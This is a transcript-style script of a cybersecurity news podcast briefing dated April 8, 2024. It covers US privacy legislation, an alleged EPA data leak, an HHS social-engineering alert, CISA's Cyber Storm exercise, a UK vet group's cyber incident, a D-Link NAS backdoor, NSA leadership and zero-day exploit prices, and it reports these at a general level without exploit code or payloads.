A possible breakthrough in data privacy legislation.

Might there be motion from Congress on data privacy legislation? Maryland passes a pair of privacy bills. A database allegedly from the EPA shows up on Russian cybercrime forums. HHS issues an alert for the Healthcare and Public Health sectors. CISA gears up for their Cyber Storm. A leading UK veterinary service provider suffers a cyber incident. A hardcoded backdoor is discovered in deprecated Network Attached Storage devices. NSA’s new cybersecurity director takes the reins. Guest Caleb Barlow, CEO of Cyberbit, shares his insights on the evolving role of the CISO. The bull market for Zero-days.

Today is April 8th, 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.(Solar eclipse reference?)

Might there be motion from Congress on data privacy legislation?

I wouldn’t get your hopes up, but Congress appears to be nearing a breakthrough on data privacy legislation with the unveiling of the American Privacy Rights Act (APRA). This bipartisan effort proposes significant restrictions on how companies can collect, retain, and utilize consumer data—limiting it to what's necessary for their services. It empowers users to opt out of targeted advertising and manage their online data, including corrections, deletions, and downloads. A key feature is the establishment of a national data broker registry, mandating an opt-out option for data sales.

The proposal addresses Americans' desire for more control over their personal information, targeting Big Tech's data practices and ensuring user consent. The APRA attempts to navigate longstanding legislative divisions, particularly around preemption of state laws and individual legal recourse against privacy breaches. It incorporates stronger protections than existing laws, allowing for state-specific regulations on civil rights and consumer protections, while including provisions from California's privacy law for lawsuits related to data breaches.

Enforcement focuses on larger businesses, exempting small companies and certain entities like government organizations. Despite its comprehensive approach, the APRA's success remains uncertain, as it enters a discussion phase for further refinement and support. 

Maryland passes a pair of privacy bills. 

Meanwhile, on the state level, the Maryland legislature has passed two major privacy bills aimed at regulating tech companies' data collection practices, especially concerning consumers and minors, despite significant opposition from industry giants like Amazon, Google, and Meta. The Maryland Online Data Privacy Act introduces broad restrictions on consumer data collection and usage within the state. The Maryland Kids Code specifically targets the protection of users under 18, banning tracking and manipulative tactics designed to keep them online. Lawmakers say these moves signal Maryland's commitment to establishing robust data privacy protections, aligning it with states like California and Connecticut. However, tech industry challenges are anticipated, particularly from groups like NetChoice, which has previously contested similar legislation on constitutional grounds. The success of these bills hinges on Governor Wes Moore's approval, positioning Maryland as a potential leader in the national privacy legislation landscape, pending inevitable legal challenges.

A database allegedly from the EPA shows up on Russian cybercrime forums. 

The U.S. Environmental Protection Agency (EPA) is contending with a significant data breach impacting over 8.5 million users, attributed to a hacker known as USDoD. The breach has exposed sensitive personal information, posing risks of identity theft, cyber espionage, and could deter environmental violation reporting. The leaked database includes contact information for customers, contractors, and staff, with details such as full names, phone numbers, email addresses, and job titles, but thankfully no passwords were compromised. The data, now circulating in Russian cybercrime forums, underscores the breach's potential for misuse in phishing scams, targeted marketing, and state-sponsored espionage. This incident highlights vulnerabilities in protecting critical environmental and infrastructure data and raises alarms about the chilling effect it could have on future environmental reporting efforts.

HHS issues an alert for the Healthcare and Public Health sectors. 

The U.S. Department of Health and Human Services (HHS) has issued an alert regarding sophisticated social engineering attacks targeting IT help desks within the Healthcare and Public Health sector. Attackers are using detailed personal information, likely harvested from professional networking sites and open-source intelligence (OSINT), to impersonate employees, particularly in financial roles. By tricking help desk personnel into enrolling new devices for multi-factor authentication (MFA), these threat actors gain access to corporate resources. Their main objective is to obtain login credentials for payer websites to redirect legitimate payments to their controlled U.S. bank accounts, eventually transferring these funds overseas. Additionally, some attacks have involved AI voice cloning techniques to enhance their deception. To combat these threats, HHS recommends several mitigation strategies, including requiring callbacks for verification, monitoring suspicious account changes, and training help desk staff to recognize and respond to social engineering and spear-phishing attempts.

CISA gears up for their Cyber Storm. 

The Cybersecurity and Infrastructure Security Agency (CISA) is gearing up for its biannual "Cyber Storm" exercise, an event designed to simulate responses to a large-scale cyberattack on U.S. critical infrastructure. This month's exercise, which is the ninth of its kind since 2006, will involve over 2,000 participants from both government and various critical sectors like healthcare, finance, and energy. The event aims to test the effectiveness of the National Cyber Incident Response Plan, which CISA is currently updating. The exercise unfolds over a week, presenting participants with hypothetical scenarios to test their preparedness and response strategies without revealing specific details ahead of time to maintain operational security. This year's Cyber Storm is particularly timely, given recent warnings about hackers targeting U.S. infrastructure, and aims to enhance readiness for inevitable real-world incidents through a collaborative approach.

A leading UK veterinary service provider suffers a cyber incident. 

Leading UK veterinary service provider CVS Group has experienced significant operational disruptions due to a cyber-incident, involving unauthorized access to its IT systems. The company, which operates vet practices, laboratories, and crematoria across the UK, Australia, the Netherlands, and Ireland, took immediate action to isolate the issue and temporarily shut down its IT systems to prevent further breaches. Although the specific nature of the cyber-attack remains under investigation, it has characteristics of ransomware. CVS has engaged specialist consultants for a forensic analysis and informed relevant authorities, including the Information Commissioner’s Office. While it has managed to restore IT services to most of its practices, increased security measures mean some systems are not fully efficient, causing ongoing operational impacts. The incident has spurred CVS to accelerate plans for migrating its IT infrastructure to the cloud. For our US listeners we note that CVS Group in the UK is unrelated to the US healthcare and pharmacy company CVS. 

A hardcoded backdoor is discovered in deprecated Network Attached Storage devices. 

A significant security flaw affects several end-of-life D-Link Network Attached Storage (NAS) models, allowing for arbitrary command execution due to a hardcoded backdoor account and a command injection vulnerability. Discovered by threat researcher 'Netsecfish,' the vulnerability allows attackers to remotely execute commands on affected devices by sending a base64-encoded command through an HTTP GET request. Over 92,000 vulnerable devices have been found online. D-Link has acknowledged that these models are no longer supported, advising users to replace them, stating that they won’t offer patches due to the devices' end-of-life status.

NSA’s new cybersecurity director takes the reins. 

Dave Luber has officially taken the reins as the new cybersecurity director of the National Security Agency (NSA), succeeding Rob Joyce who retired on March 31 after 35 years of public service. Luber, with over 30 years of experience in various significant roles within the NSA and US Cyber Command, will now lead the agency’s cybersecurity directorate. This directorate aims to combat cyber threats against the Department of Defense, National Security Systems, and the Defense Industrial Base. Luber expressed his commitment to building upon the team's achievements and enhancing collaborations to bolster cybersecurity defenses.

Next up, we’ve got my discussion with Caleb Barlow, CEO of Cyberbit, about how we need to think about the role and position of the CISO.

 

The bull market for Zero-days. 

And finally, the market for “zero-days,” hacking tools that exploit unpatched software vulnerabilities, has seen a significant price increase, with values reaching millions. Crowdfense, a startup company that acquires these tools to resell primarily to government agencies, now offers up to $7 million for iPhone hacks, $5 million for Android, and between $3 and $3.5 million for browser exploits. This price hike reflects the growing difficulty of hacking devices and apps due to enhanced security measures by companies like Apple and Google. The rising costs also indicate the complexity and team effort required to develop such exploits now, compared to the past where a single researcher could find and develop a zero-day. Amidst global tensions and sanctions, the industry faces ethical and legal scrutiny, especially when exploits may target individuals in countries with contentious human rights records.

At these prices, our social media influencer desk wonders how long it will be before online trend-setters stop bragging about the high cost of their mobile devices and diamond-studded cases, and shift to the multi-million dollar valuations of their potential security weaknesses. Stranger things have happened…

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

 

We’d love to know what you think of this podcast. You can email us at cyberwire@n2k.com—your feedback helps us ensure we’re delivering the information and insights that help keep you a step ahead in the rapidly changing world of cybersecurity.

We’re privileged that N2K and podcasts like the CyberWire are part of the daily intelligence routine of many of the most influential leaders and operators in the public and private sector, as well as the critical security teams supporting the Fortune 500 and many of the world’s preeminent intelligence and law enforcement agencies.

N2K strategic workforce intelligence optimizes the value of your biggest investment—people. We make you smarter about your team, while making your team smarter. Learn more at n2k.com.

 

This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music by Elliott Peltzman. Our executive producers are Jennifer Eiben and Brandon Karpf. Our executive editor is Peter Kilpe, and I’m Dave Bittner. Thanks for listening.